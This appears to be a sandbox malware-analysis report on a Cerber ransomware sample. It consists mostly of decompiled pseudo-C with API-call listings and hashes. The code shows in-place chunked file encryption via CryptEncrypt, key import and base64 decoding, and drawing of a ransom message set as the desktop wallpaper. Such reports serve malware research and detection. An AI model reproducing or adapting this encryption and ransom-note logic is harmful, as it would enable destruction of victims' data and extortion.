Part of subcall function 0040A150: StrCmpNW.SHLWAPI(?,00000000,?,?,00000004), ref: 0040A1AB

lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryTypelstrcpy
String ID:
API String ID: 1343905201-0
Opcode ID: fb8214b57ff391eef166a269f4d041575812d1a1ca94e8a2537d2988d6348e61
Instruction ID: 143d95b2e26e474ba70c68f4ebdd59fdd72542839aac86a6ec3040addcf4e822
Opcode Fuzzy Hash: fb8214b57ff391eef166a269f4d041575812d1a1ca94e8a2537d2988d6348e61
Instruction Fuzzy Hash: 1DF08C36910229BBCB14EBE0D8019DEB7A8EF04790B108176EC04EA240E6348A518399

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004089AC Relevance: 58.1, APIs: 31, Strings: 2, Instructions: 366
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004089AC(signed int __edx, void* __eflags, char _a4) {
				struct HDC__* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				void* _v40;
				struct tagRECT _v56;
				void* _v60;
				void* _v64;
				struct tagRECT _v80;
				intOrPtr _v86;
				intOrPtr _v94;
				void _v96;
				int _v120;
				signed int _v122;
				short _v124;
				signed int _v128;
				void _v132;
				void _v136;
				int _v152;
				signed int _v156;
				void _v160;
				void* __edi;
				void* __esi;
				void* _t99;
				struct HDC__* _t101;
				void* _t104;
				void* _t109;
				struct HDC__* _t111;
				int _t114;
				void* _t115;
				int _t118;
				signed int _t123;
				void* _t125;
				signed int _t143;
				signed int _t144;
				signed int _t159;
				void* _t162;
				WCHAR* _t167;
				void* _t169;
				signed char _t189;
				signed char _t191;
				int _t195;
				void* _t201;
				void* _t202;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t216;
				signed int _t219;
				struct HDC__* _t221;
				int _t223;
				struct HDC__* _t230;
				void* _t236;
				long _t240;

				_t214 = __edx;
				_t99 = E00405905(0x40d738, 9, 0xf223c378);
				_t1 =  &_a4; // 0x40667b
				_t101 = E004031AF( *_t1, __eflags, _t99);
				_t221 = _t101;
				_v16 = _t221;
				_t259 = _t221;
				if(_t221 != 0) {
					_t104 = E004031AF(_t221, _t259, E00405905(0x40d76c, 0x10, 0x1f2f764e));
					_pop(_t201);
					_t101 = E00403253(_t104, _t259) | _t214;
					_t260 = _t101;
					if(_t101 != 0) {
						_push( &_v40);
						_t109 = E004031AF(_t221, _t260, E00405905(0x40d514, 4, 0x22a8cdeb));
						_t202 = _t201;
						_t101 = E004078F0(E004032B8(_t109, _t260), _t202, _t214);
						_v28 = _t101;
						if(_t101 != 0) {
							_t101 = GetDC(0);
							_t230 = _t101;
							_v36 = _t230;
							if(_t230 != 0) {
								_t111 = CreateCompatibleDC(_t230);
								_v12 = _t111;
								if(_t111 == 0) {
									L20:
									return ReleaseDC(0, _t230);
								}
								_t223 = GetDeviceCaps(_t230, 8);
								_t114 = GetDeviceCaps(_t230, 0xa);
								_v24 = _t114;
								_t115 = CreateCompatibleBitmap(_t230, _t223, _t114);
								_v32 = _t115;
								_t264 = _t115;
								if(_t115 == 0) {
									L19:
									_t98 =  &_v12; // 0x40667b
									DeleteDC( *_t98);
									goto L20;
								}
								_t9 =  &_v12; // 0x40667b
								_v40 = SelectObject( *_t9, _t115);
								_t118 = GetDeviceCaps(_t230, 0x5a);
								_t123 = MulDiv(E00403253(E004031AF(_v16, _t264, E00405905( &E0040D744, 4, 0x149d4cf6)), _t264), _t118, 0x48);
								_t125 = CreateFontW( ~_t123, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
								_v64 = _t125;
								_t265 = _t125;
								if(_t125 == 0) {
									L18:
									SelectObject(_v12, _v40);
									DeleteObject(_v32);
									_t230 = _v36;
									goto L19;
								}
								_v60 = SelectObject(_v12, _t125);
								SetBkColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d758, 0xa, 0xac908572)), _t265));
								SetTextColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d764, 5, 0xb1a3f726)), _t265));
								_t236 = _v24;
								_v56.left = 0;
								_v56.top = 0;
								_v56.right = _t223;
								_v56.bottom = _t236;
								FillRect(_v12,  &_v56, GetStockObject(2));
								_t143 = _t236 * _t223;
								_t207 = 0xa;
								_t144 = _t143 / _t207;
								_t216 = _t143 % _t207;
								if(_t144 <= 0) {
									L11:
									_v80.left = 0;
									_v80.top = 0;
									_v80.right = _t223;
									_v80.bottom = _t236;
									DrawTextA(_v12, _v28, 0xffffffff,  &_v80, 0x411);
									asm("cdq");
									asm("cdq");
									_v56.top = (_v56.bottom - _t216 >> 1) - (_v80.bottom - _t216 >> 1);
									DrawTextA(_v12, _v28, 0xffffffff,  &_v56, 0x11);
									GetObjectW(_v32, 0x18,  &_v160);
									_t210 = 9;
									memset( &_v132, 0, _t210 << 2);
									_t159 = _v156;
									_t212 = _v152;
									_v132 = _t159;
									_v124 = 1;
									_t219 = 0x20;
									_v122 = _t219;
									asm("cdq");
									_t240 = ((_t219 & 0x0000001f) + (_t159 << 5) + 0x1f >> 5) * _t212 << 2;
									_v136 = 0x28;
									_v128 = _t212;
									_v120 = 0;
									_t162 = E004053BD(_t212);
									_v24 = _t162;
									if(_t162 != 0) {
										GetDIBits(_v36, _v32, 0, _v152, _t162,  &_v136, 0);
										_t167 = E00404D43(E0040591C(0x40d780, 4, 0x91fa4d45));
										_v28 = _t167;
										if(_t167 != 0) {
											_t169 = CreateFileW(_t167, 0x40000000, 1, 0, 2, 0x80, 0);
											_v16 = _t169;
											if(_t169 != 0xffffffff) {
												asm("stosd");
												asm("stosd");
												asm("stosd");
												_v94 = _t240 + 0x36;
												_v96 = 0x4d42;
												_v86 = 0x36;
												_v20 = 0;
												WriteFile(_v16,  &_v96, 0xe,  &_v20, 0);
												WriteFile(_v16,  &_v136, 0x28,  &_v20, 0);
												WriteFile(_v16, _v24, _t240,  &_v20, 0);
												CloseHandle(_v16);
												SystemParametersInfoW(0x14, 0, _v28, 3);
											}
											E00405463(_v28);
										}
										E00405463(_v24);
									}
									SelectObject(_v12, _v60);
									DeleteObject(_v64);
									goto L18;
								}
								_v20 = _t144;
								do {
									_v16 = (E004063E1(0xff) & 0x000000ff) << 8;
									_t189 = E004063E1(0xff);
									_t191 = E004063E1(0xff);
									_t195 = E004063E1(_v56.bottom);
									SetPixel(_v12, E004063E1(_v56.right), _t195, _t191 & 0x000000ff | (_t189 & 0x000000ff | _v16) << 0x00000008);
									_t36 =  &_v20;
									 *_t36 = _v20 - 1;
								} while ( *_t36 != 0);
								_t236 = _v24;
								goto L11;
							}
						}
					}
				}
				return _t101;
			}

0x004089ac
0x004089c4
0x004089cd
0x004089d0
0x004089d5
0x004089da
0x004089dd
0x004089df
0x004089fc
0x00408a01
0x00408a09
0x00408a09
0x00408a0b
0x00408a14
0x00408a2d
0x00408a32
0x00408a3d
0x00408a43
0x00408a48
0x00408a4f
0x00408a55
0x00408a57
0x00408a5c
0x00408a63
0x00408a69
0x00408a6e
0x00408df3
0x00000000
0x00408df5
0x00408a80
0x00408a82
0x00408a8b
0x00408a8e
0x00408a94
0x00408a97
0x00408a99
0x00408dea
0x00408dea
0x00408ded
0x00000000
0x00408ded
0x00408aa0
0x00408aae
0x00408ab1
0x00408ade
0x00408b0c
0x00408b12
0x00408b15
0x00408b17
0x00408dd2
0x00408dd8
0x00408de1
0x00408de7
0x00000000
0x00408de7
0x00408b33
0x00408b53
0x00408b82
0x00408b88
0x00408b8d
0x00408b90
0x00408b93
0x00408b96
0x00408ba7
0x00408baf
0x00408bb6
0x00408bb7
0x00408bb7
0x00408bbb
0x00408c18
0x00408c26
0x00408c2c
0x00408c2f
0x00408c32
0x00408c35
0x00408c3e
0x00408c46
0x00408c51
0x00408c60
0x00408c72
0x00408c7c
0x00408c82
0x00408c84
0x00408c8a
0x00408c91
0x00408c94
0x00408c9d
0x00408c9e
0x00408ca5
0x00408cb2
0x00408cb7
0x00408cc1
0x00408cc4
0x00408cc7
0x00408ccc
0x00408cd1
0x00408ced
0x00408d09
0x00408d0e
0x00408d13
0x00408d2a
0x00408d30
0x00408d36
0x00408d3d
0x00408d3e
0x00408d3f
0x00408d43
0x00408d4c
0x00408d5d
0x00408d64
0x00408d67
0x00408d7e
0x00408d90
0x00408d99
0x00408da7
0x00408da7
0x00408db0
0x00408db0
0x00408db8
0x00408db8
0x00408dc3
0x00408dcc
0x00000000
0x00408dcc
0x00408bbd
0x00408bc0
0x00408bd2
0x00408bd7
0x00408bea
0x00408bf8
0x00408c0a
0x00408c10
0x00408c10
0x00408c10
0x00408c15
0x00000000
0x00408c15
0x00408a5c
0x00408a48
0x00408a0b
0x00408dff

APIs

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938

GetDC.USER32(00000000), ref: 00408A4F
CreateCompatibleDC.GDI32(00000000), ref: 00408A63
GetDeviceCaps.GDI32(00000000,00000008), ref: 00408A77
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408A82
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408A8E
SelectObject.GDI32({f@,00000000), ref: 00408AA3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00408AB1
MulDiv.KERNEL32(00000000), ref: 00408ADE
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408B0C
SelectObject.GDI32(?,00000000), ref: 00408B21
SetBkColor.GDI32(?,00000000), ref: 00408B53

Part of subcall function 00403253: StrToInt64ExA.SHLWAPI(?,00000000,?,F5C6A5FE,?,?,?,00402CB1,?,?,?,00000000,00000000,00406B45,?,00000000), ref: 004032A9

SetTextColor.GDI32(?,00000000), ref: 00408B82
GetStockObject.GDI32(00000002), ref: 00408B99
FillRect.USER32(?,?,00000000), ref: 00408BA7
SetPixel.GDI32(?,00000000,00000000,?), ref: 00408C0A
DrawTextA.USER32(?,?,000000FF,?,00000411), ref: 00408C35
DrawTextA.USER32(?,?,000000FF,?,00000011), ref: 00408C60
GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408C72
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00408CED
CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00408D2A
WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 00408D67
WriteFile.KERNEL32(?,00000028,00000028,?,00000000), ref: 00408D7E
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00408D90
CloseHandle.KERNEL32(?), ref: 00408D99
SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00408DA7
SelectObject.GDI32(?,?), ref: 00408DC3
DeleteObject.GDI32(?), ref: 00408DCC
SelectObject.GDI32(?,?), ref: 00408DD8
DeleteObject.GDI32(?), ref: 00408DE1
DeleteDC.GDI32({f@), ref: 00408DED
ReleaseDC.USER32(00000000,00000000), ref: 00408DF5

Strings

{f@, xrefs: 004089CD
{f@, xrefs: 00408DEA, 00408AA0

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Object$CreateFileSelect$CapsDeleteDeviceTextWrite$ColorCompatibleDraw$BitmapBitsCloseFillFontHandleInfoInt64ParametersPixelRectReleaseStockSystemlstrcmpilstrlen
String ID: {f@${f@
API String ID: 2080757576-3352485320
Opcode ID: aedb9ef7960e73c4434157ea5a2a6b2b3e083f41ac50908eb0ab93981d7f6be4
Instruction ID: 2856dbb673b69ec4cade2b047b667f652ddefbff5f4d6f99c4febc8329f0e424
Opcode Fuzzy Hash: aedb9ef7960e73c4434157ea5a2a6b2b3e083f41ac50908eb0ab93981d7f6be4
Instruction Fuzzy Hash: F4C19FB2D00218BFDB10AFA5DD45AAEBBB8EF48311F10457AF601F72E1DB7849058B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B283 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 127
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B283(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8, char _a12) {
				char _v5;
				void* _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				void* __esi;
				signed int _t64;
				signed int _t66;
				void* _t68;
				intOrPtr _t71;
				signed int _t72;
				char _t75;
				intOrPtr* _t79;
				intOrPtr* _t86;
				int _t87;
				void* _t88;
				void* _t93;
				void* _t95;
				signed int _t97;
				char _t98;
				char _t99;
				signed int _t101;
				intOrPtr _t104;
				signed int _t105;
				void* _t108;

				_t1 =  &_a12; // 0x402a28
				_t105 = E0040B146(__ecx, _a4);
				_t64 =  *( *_t1);
				_t3 = _t105 - 0xb; // -11
				_t87 = _t3;
				_t97 = _t64 % _t87;
				_t92 = 0 | _t97 != 0x00000000;
				_v36 = _t97;
				_t101 = _t64 / _t87 + (_t97 != 0);
				_v28 = _t101;
				_v40 = _t101 * _t105;
				_t66 = E004053BD(_t97 != 0);
				_v20 = _t66;
				if(_t66 != 0) {
					_t68 = E004053BD(_t92);
					_v12 = _t68;
					if(_t68 != 0) {
						_v24 = _v24 & 0x00000000;
						_t19 =  &_v20; // 0x402a28
						_t104 =  *_t19;
						_v16 = _a8;
						_t71 = _v28 - 1;
						_v5 = 1;
						_v32 = _t71;
						if(_t71 == 0) {
							L8:
							_t72 = _v36;
							_v24 = _t72;
							if(_t72 == 0) {
								_v24 = _t87;
							}
							memcpy(_v12, _v16, _v24);
							_t88 = _v12;
							_t75 =  *0x40fa50(_a4, 0, 1, 0, _t88,  &_v24, _t105);
							if(_t75 == 0) {
								_v5 = _t75;
							}
							_t93 = 0;
							if(_t105 != 0) {
								_t52 = _t88 - 1; // -1
								_t79 = _t105 + _t52;
								do {
									_t98 =  *_t79;
									_t79 = _t79 - 1;
									 *((char*)(_t93 + _t104)) = _t98;
									_t93 = _t93 + 1;
								} while (_t93 < _t105);
							}
							if(_v5 != 0) {
								_t60 =  &_a12; // 0x402a28
								 *( *_t60) = _v40;
							} else {
								goto L16;
							}
						} else {
							while(1) {
								_v28 = _t87;
								memcpy(_v12, _v16, _t87);
								_t108 = _t108 + 0xc;
								 *0x40fa50(_a4, 0, 0, 0, _v12,  &_v28, _t105);
								if(0 == 0) {
									break;
								}
								_t95 = 0;
								if(_t105 != 0) {
									_t32 = _v12 - 1; // -1
									_t86 = _t105 + _t32;
									do {
										_t99 =  *_t86;
										_t86 = _t86 - 1;
										 *((char*)(_t95 + _t104)) = _t99;
										_t95 = _t95 + 1;
									} while (_t95 < _t105);
								}
								_t104 = _t104 + _v28;
								_v16 = _v16 + _t87;
								_v24 = _v24 + 1;
								if(_v24 < _v32) {
									continue;
								} else {
									goto L8;
								}
								goto L18;
							}
							L16:
							_t55 =  &_v20; // 0x402a28
							E00405463( *_t55);
							E00405463(_v12);
							_v20 = _v20 & 0x00000000;
						}
					}
				}
				L18:
				_t61 =  &_v20; // 0x402a28
				return  *_t61;
			}

0x0040b289
0x0040b299
0x0040b29b
0x0040b29f
0x0040b29f
0x0040b2a2
0x0040b2a9
0x0040b2ac
0x0040b2af
0x0040b2b2
0x0040b2b8
0x0040b2bb
0x0040b2c0
0x0040b2c5
0x0040b2cd
0x0040b2d2
0x0040b2d7
0x0040b2e0
0x0040b2e4
0x0040b2e4
0x0040b2e7
0x0040b2ed
0x0040b2ee
0x0040b2f2
0x0040b2f5
0x0040b350
0x0040b350
0x0040b353
0x0040b358
0x0040b35a
0x0040b35a
0x0040b366
0x0040b36b
0x0040b380
0x0040b388
0x0040b38a
0x0040b38a
0x0040b38d
0x0040b391
0x0040b393
0x0040b393
0x0040b397
0x0040b397
0x0040b399
0x0040b39a
0x0040b39d
0x0040b39e
0x0040b397
0x0040b3a6
0x0040b3c1
0x0040b3c4
0x00000000
0x00000000
0x00000000
0x0040b2f7
0x0040b2f7
0x0040b2fb
0x0040b301
0x0040b306
0x0040b319
0x0040b321
0x00000000
0x00000000
0x0040b327
0x0040b32b
0x0040b330
0x0040b330
0x0040b334
0x0040b334
0x0040b336
0x0040b337
0x0040b33a
0x0040b33b
0x0040b334
0x0040b33f
0x0040b342
0x0040b345
0x0040b34e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b34e
0x0040b3a8
0x0040b3a8
0x0040b3ab
0x0040b3b3
0x0040b3b8
0x0040b3b8
0x0040b2f5
0x0040b2d7
0x0040b3c6
0x0040b3c6
0x0040b3cd

APIs

Part of subcall function 0040B146: CryptGetKeyParam.ADVAPI32(?,00000009,004029D6,?,00000000,0040D17C,004029D6,004029D6,?,0040273B,00000000,80C426C8,?,00000000), ref: 0040B166

memcpy.NTDLL(00000000,00000000,-0000000B,80C426C8,00000000,?), ref: 0040B301
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,80C426C8,00000000,?), ref: 0040B319
memcpy.NTDLL(00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B366
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B380

Strings

(*@, xrefs: 0040B289, 0040B3C1
(*@, xrefs: 0040B3C6, 0040B2E4, 0040B3A8

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$Encryptmemcpy$Param
String ID: (*@$(*@
API String ID: 673012589-2671997973
Opcode ID: 35c1e2850f4d88c7f96264c3ccc4014cce949d9499f9bceb127627fd9100d7d6
Instruction ID: 54093158f1a825de50d9d814c6b244fb5fab6a3abbe75fd9e2e92e6b8b7ee4fc
Opcode Fuzzy Hash: 35c1e2850f4d88c7f96264c3ccc4014cce949d9499f9bceb127627fd9100d7d6
Instruction Fuzzy Hash: 2D415771D0020AAFDF11DFA5C881AEFBBB9EF44704F24407AE801B7291D7359E458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040194B Relevance: 10.6, APIs: 7, Instructions: 100
fileencryptionsleepCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040194B(void* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, union _LARGE_INTEGER _a24, union _LARGE_INTEGER* _a28) {
				struct _OVERLAPPED* _v5;
				signed char _v12;
				char _v16;
				char _v20;
				long* _v24;
				long _v28;
				long _v32;
				void* __esi;
				long* _t44;
				struct _OVERLAPPED* _t62;
				void* _t63;
				intOrPtr _t68;
				intOrPtr _t70;
				long _t71;
				void* _t72;

				_t62 = 0;
				_t44 = E0040AF8D( *0x42f7a4 & 0x0000ffff, _a8);
				_pop(_t63);
				_v24 = _t44;
				if(_t44 == 0) {
					L9:
					return _t62;
				}
				_t68 = _a12;
				_v20 = 0;
				_v16 = 0;
				_v5 = 1;
				_v12 = 0;
				while(_t68 != _t62) {
					_t70 =  *0x42f7d8; // 0x40000
					_v12 = _v12 + 1;
					_push(_t62);
					_t71 =  <  ? _t68 : _t70;
					_t68 = _t68 - _t71;
					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
					ReadFile(_a4, _a16, _t71,  &_v32, _t62);
					E0040ADF6(_t63, _a16,  &_v20,  &_v16, _t71);
					_t72 = _t72 + 0xc;
					_push(_t71);
					_push( &_v28);
					_push(_a16);
					_push(_t62);
					_v28 = _t71;
					_push(0 | _t68 == _t62);
					_push(_t62);
					_push(_v24);
					if( *0x40fa50() == 0) {
						_v5 = _t62;
						L8:
						 *((intOrPtr*)(_a20 + 4)) = E0040AEED(_v16, _v20, _a12);
						CryptDestroyKey(_v24);
						_t62 = _v5;
						goto L9;
					}
					_push(_t62);
					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
					WriteFile(_a4, _a16, _t71,  &_v32, _t62);
					_a24.LowPart = _a24 + _t71;
					asm("adc [ebp+0x20], ebx");
					if((_v12 & 0x00000001) == 0) {
						Sleep(1);
					}
				}
				goto L8;
			}

0x0040195e
0x00401960
0x00401965
0x00401966
0x0040196b
0x00401a56
0x00401a5a
0x00401a5a
0x00401971
0x00401974
0x00401977
0x0040197a
0x0040197e
0x00401a26
0x00401986
0x0040198c
0x0040198f
0x00401999
0x0040199f
0x004019a1
0x004019b3
0x004019c5
0x004019ca
0x004019cd
0x004019d1
0x004019d2
0x004019dc
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019ed
0x00401a30
0x00401a33
0x00401a48
0x00401a4b
0x00401a51
0x00000000
0x00401a51
0x004019ef
0x004019fa
0x00401a0c
0x00401a12
0x00401a15
0x00401a1c
0x00401a20
0x00401a20
0x00401a1c
0x00000000

APIs

Part of subcall function 0040AF8D: memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
Part of subcall function 0040AF8D: CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 004019A1
ReadFile.KERNEL32(00000000,00040000,00040000,?,00000000), ref: 004019B3
CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,?,00040000), ref: 004019E5
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004019FA
WriteFile.KERNEL32(00000000,?,00040000,?,00000000), ref: 00401A0C
Sleep.KERNEL32(00000001), ref: 00401A20
CryptDestroyKey.ADVAPI32(?), ref: 00401A4B

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Crypt$Pointer$DestroyEncryptImportReadSleepWritememcpy
String ID:
API String ID: 1821214037-0
Opcode ID: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
Instruction ID: 18c608ade0755fad8d0103536e9642e00f749d4286a3dbf0ab3fd0c468255ba2
Opcode Fuzzy Hash: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
Instruction Fuzzy Hash: B63134B290121AAFCF119FA4DD849EF7F79EF48304F00407AF905A2161D7368A69DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 89
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401000(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t40;
				int _t49;
				char* _t50;
				char* _t51;
				void* _t52;
				int _t53;
				char* _t59;
				int _t61;
				void* _t62;
				void* _t63;
				void* _t64;

				E0040B654(__ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t62 - 0x28)) = 0;
				 *(_t62 - 4) = 0;
				 *((intOrPtr*)(_t62 - 0x1c)) =  *0x40f19c(__ecx, 0x40da98, 0x68);
				 *(_t62 - 0x24) = __ecx;
				_t40 = E00405905(0x40cea8, 4, 0x9946767a);
				_t64 = _t63 + 0xc;
				 *(_t62 - 0x30) = _t40;
				 *(_t62 - 0x20) =  *(_t62 + 8);
				while( *((intOrPtr*)(_t62 - 0x1c)) != 0) {
					if( *_t59 != 0x2d) {
						L5:
						 *(_t62 - 0x78) = 0;
						memset(_t62 - 0x77, 0, 0x40);
						_t64 = _t64 + 0xc;
						_t61 = 0;
						while(1) {
							 *(_t62 - 0x34) = _t61;
							if( *((intOrPtr*)(_t62 - 0x1c)) == 0 || _t61 >= 0x40) {
								break;
							}
							_t53 = StrSpnA(_t59,  *(_t62 - 0x30));
							_t59 =  &(_t59[_t53]);
							 *(_t62 - 0x24) = _t59;
							_t18 = _t62 - 0x1c;
							 *_t18 =  *((intOrPtr*)(_t62 - 0x1c)) - _t53;
							if( *_t18 == 0) {
								break;
							}
							 *((char*)(_t62 + _t61 - 0x78)) =  *_t59;
							_t61 = _t61 + 1;
							_t59 =  &(_t59[1]);
							 *(_t62 - 0x24) = _t59;
							 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - 1;
						}
						if(_t61 == 0) {
							break;
						}
						 *(_t62 - 0x2c) = _t61;
						if(CryptStringToBinaryA(_t62 - 0x78, _t61, 1,  *(_t62 - 0x20), _t62 - 0x2c, 0, 0) == 0) {
							break;
						}
						_t49 =  *(_t62 - 0x2c);
						 *((intOrPtr*)(_t62 - 0x28)) =  *((intOrPtr*)(_t62 - 0x28)) + _t49;
						if( *(_t62 - 0x20) != 0) {
							 *(_t62 - 0x20) =  &(( *(_t62 - 0x20))[_t49]);
						}
						continue;
					}
					_t50 = E00405905(0x40ceb0, 2, 0x1d2258b8);
					_t64 = _t64 + 0xc;
					_t51 = StrPBrkA(_t59, _t50);
					if(_t51 == 0) {
						break;
					}
					_t52 = _t51 - _t59;
					_t59 =  &(_t59[_t52]);
					 *(_t62 - 0x24) = _t59;
					 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - _t52;
					goto L5;
				}
				 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
				return E0040B68F( *((intOrPtr*)(_t62 - 0x28)));
			}

0x00401007
0x0040100c
0x00401010
0x00401013
0x0040101d
0x00401020
0x0040102f
0x00401034
0x00401037
0x0040103d
0x00401040
0x0040104c
0x0040107c
0x0040107c
0x00401086
0x0040108b
0x0040108e
0x00401090
0x00401090
0x00401096
0x00000000
0x00000000
0x004010a1
0x004010a7
0x004010a9
0x004010ac
0x004010ac
0x004010af
0x00000000
0x00000000
0x004010b3
0x004010b7
0x004010b8
0x004010b9
0x004010bc
0x004010bc
0x004010c3
0x00000000
0x00000000
0x004010c5
0x004010e0
0x00000000
0x00000000
0x004010e2
0x004010e5
0x004010eb
0x004010f1
0x004010f1
0x00000000
0x004010eb
0x0040105a
0x0040105f
0x00401064
0x0040106c
0x00000000
0x00000000
0x00401072
0x00401074
0x00401076
0x00401079
0x00000000
0x00401079
0x00401100
0x0040110c

APIs

lstrlen.KERNEL32(?,0040DA98,00000068,00401114,00000000,0040113B,00000000,00000000,00000000,0040279F,00000000,00000000,004029D6,0042F7C8,0040D17C,80C426C8), ref: 00401017
StrPBrkA.SHLWAPI(?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00401064
memset.NTDLL ref: 00401086
StrSpnA.SHLWAPI(?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 004010A1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004010D8

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: BinaryCryptStringlstrlenmemset
String ID:
API String ID: 3810766292-0
Opcode ID: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
Instruction ID: c7d5595ef341d99572007a40d8366c5632a506f8eb375d6286f033b694829096
Opcode Fuzzy Hash: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
Instruction Fuzzy Hash: C9314BB1C00259AFDF209FF98884AEEBBB4AF48350F14453BF651B6291D33849808F69

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE4 Relevance: 6.0, APIs: 4, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(00000000,00404E95,00000000,00000208,?,00000000,00000000), ref: 00404E02
RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 00404E19
